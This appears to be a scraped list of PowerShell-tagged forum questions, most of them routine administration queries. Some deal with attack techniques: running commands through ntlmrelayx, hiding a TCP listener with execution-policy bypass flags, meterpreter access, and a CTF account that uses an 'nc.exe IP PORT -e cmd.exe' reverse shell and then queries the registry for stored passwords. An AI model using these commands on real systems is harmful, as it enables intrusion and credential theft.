I would like to list of servers which are sql servers updates(sps&Cus) enabled through windows updates or microsoft updates by using powershell scripts.
Tag: Powershell
ntlmrealyx powershell usage
I would like to know about your experience regarding the use of ntlmrelayx
When using ntlmrelayx.py -tf targets.txt -c "Powershell command" does this powershell command need to be an Empire launcher or can it be any powershell command like a powershell onliner?
Thanks
How to hide tcp port listener powershell script?
GOALS: run a powershell script without showing the window (it’s ok if it pops up for few seconds).
PROBLEM: the script tcplisten.ps1
works just if the window is displayed to the user. All the attempts below don’t work. Because when I run netstat -ano -p tcp
, port 9999
is not listening.
tcplisten.ps1
$ Listener = [System.Net.Sockets.TcpListener]9999; $ Listener.Start()
ATTEMPTS:
powershell.exe
powershell.exe -windowstyle hidden .\tcplisten.ps1
hidden -command
powershell -windowstyle hidden -command $ Listener = [System.Net.Sockets.TcpListener]9999; $ Listener.Start()
-NoProfile -NonInteractive -ExecutionPolicy Bypass
powershell -NoP -NonI -W Hidden -Exec Bypass -Command
Start-Process
Start-Process powershell.exe -ArgumentList "-WindowsStyle hidden -file .\tcplisten.ps1"
vbs script
Create a .vbs with this script and run it
command = "powershell.exe -nologo -command C:\Users\Utente\Desktop\tcplisten.ps1" set shell = CreateObject("WScript.Shell") shell.Run command,0
QUESTION: is there a solution? Am I doing some mistake?
How to salt a password using PowerShell and how to store the salt? [migrated]
I was looking about how to salt a password in PowerShell, as SHA512 is not the safest way to store them, I want to add a salt to reduce bruteforcing.
Is there any way to add a salt to a password and then store it, to next at the moment ton authenticate use the appropiate salt?
Access to the powershell of win xp machine by meterpreter session
I can’t find any ways to access the PowerShell of a hacked win xp machine . Can anyone please help me out doing this !!
Bitlocker Powershell Module [migrated]
I’m newer to the topic of Powershell modules in general, finding them, downloading (or finding/installing them from the internet using find-module and install-module, etc.). But I specifically need information at the moment about finding/installing the bitlocker module. I see numerous forum references to the cmdlets in this module but no one mentions the module itself. ‘Install-module bitlocker’ errors out with ‘No match was found’ for that module name. I’m doing this from a Windows 2016 server.
Compressed Memory Stream to Powershell Cmdlet
I would like to know if there is any tool or some way to convert a compressed memory stream to a powershell cmdlet and if so if you could provide some guidance on how to do it?
Thanks
Powershell (WinRM) and cmd.exe: reg query output deviation
during a CTF I encountered the following anomaly regarding PS & cmd.exe:
- I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell.
- Via the PS shell I transferred nc.exe to the machine and used cmd.exe /c “nc.exe IP PORT -e cmd.exe” to spawn an additional regular cmd.exe shell back to me.
I searched the registry for stored passwords using the following command: reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”
This is where I noticed that the PS shell reg query returns considerable more output than the cmd.exe reg query. PS includes the “DefaultPassword” entry, whereas cmd.exe does not include this value.
The full output deviation is captured in the following screenshot: The same behavior is observable for other registry items. PS generally returns more elements than the cmd.exe “sub-shell”.
Any hints to why this behavior occurs are greatly appreciated.
Powershell script to get workflow tasks for each list item
I have a lot of number of webs (sub-sites) within a site collection that have lists that have list items with Approval workflows running on them.
How would I get all tasks for each list item in powershell? I see that the “tasks” list has the ‘Related Content’ column which has the title of the list item. How to I do a union between the two lists (the task list and the item list) in powershell?
Thanks for your help!
Powershell script to get workflow tasks for each list item
I have a lot of number of webs (sub-sites) within a site collection that have lists that have list items with Approval workflows running on them.
How would I get all tasks for each list item in powershell? I see that the “tasks” list has the ‘Related Content’ column which has the title of the list item. How to I do a union between the two lists (the task list and the item list) in powershell?
Thanks for your help!